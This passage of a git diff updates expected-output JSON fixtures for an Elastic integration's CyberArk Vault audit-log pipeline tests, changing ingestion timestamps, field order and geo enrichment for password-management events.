\u003cFile\u003eRoot\\\\Database-MySQL-10.128.0.7-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.7\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:13:59\",\"IsoTimestamp\":\"2021-03-15T15:13:59Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.128.0.7-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.7\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "52", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json index 86bc4413574..41582f6780c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json @@ -92,7 +92,7 @@ "event": { "severity": 7, "reason": "Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002", - "ingested": "2021-12-09T13:37:07.987594400Z", + "ingested": "2021-12-14T14:42:36.839714470Z", "original": "\u003c7\u003e1 2021-03-25T12:00:08Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 08:00:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T12:00:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e57\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux Accounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-rhel7.cybr.com-firecall2\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=rhel7.cybr.com;username=firecall2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"firecall2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"rhel7.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Name\\\" Value=\\\"Operating System-UnixSSH-rhel7.cybr.com-root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Folder\\\" Value=\\\"Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Safe\\\" Value=\\\"Linux Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1616673608\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580255\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011989\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1576120341\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"No\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 08:00:08\",\"IsoTimestamp\":\"2021-03-25T12:00:08Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"57\",\"Desc\":\"CPM Change Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux Accounts\",\"File\":\"Root\\\\Operating System-UnixSSH-rhel7.cybr.com-firecall2\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\",\"ExtraDetails\":\"address=rhel7.cybr.com;username=firecall2;\",\"Message\":\"CPM Change Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"firecall2\"},{\"Name\":\"Address\",\"Value\":\"rhel7.cybr.com\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"ExtraPass3Name\",\"Value\":\"Operating System-UnixSSH-rhel7.cybr.com-root\"},{\"Name\":\"ExtraPass3Folder\",\"Value\":\"Root\"},{\"Name\":\"ExtraPass3Safe\",\"Value\":\"Linux Root\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1616673608\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580255\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011989\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1576120341\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"No\"},{\"Name\":\"Tags\",\"Value\":\"SSH\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "57", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json index b67bb987722..3ce9605eafc 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -45,14 +38,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-12-09T13:37:08.157345200Z", + "ingested": "2021-12-14T14:42:37.050594232Z", "original": "\u003c5\u003e1 2021-03-04T19:25:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:25:02\",\"IsoTimestamp\":\"2021-03-04T19:25:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -92,7 +92,7 @@ "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-12-09T13:37:08.157354300Z", + "ingested": "2021-12-14T14:42:37.050596755Z", "original": "Mar 08 03:10:31 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" @@ -102,18 +102,6 @@ ] }, { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -129,6 +117,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -146,14 +139,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-12-09T13:37:08.157360200Z", + "ingested": "2021-12-14T14:42:37.050597260Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"System\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json index 9fa0357de03..a2d4f6f93ec 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json @@ -7,6 +7,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -87,7 +96,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403065Z", + "ingested": "2021-12-14T14:42:37.331268042Z", "original": "\u003c7\u003e1 2021-03-11T21:12:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615497142\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:12:22\",\"IsoTimestamp\":\"2021-03-11T21:12:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615497142\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -116,6 +125,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -197,7 +215,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403073500Z", + "ingested": "2021-12-14T14:42:37.331271168Z", "original": "\u003c7\u003e1 2021-03-14T13:18:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615727895\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:18:15\",\"IsoTimestamp\":\"2021-03-14T13:18:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=2;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615727895\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -226,6 +244,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -305,7 +332,7 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-12-09T13:37:08.403079100Z", + "ingested": "2021-12-14T14:42:37.331271716Z", "original": "\u003c7\u003e1 2021-03-14T13:46:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n 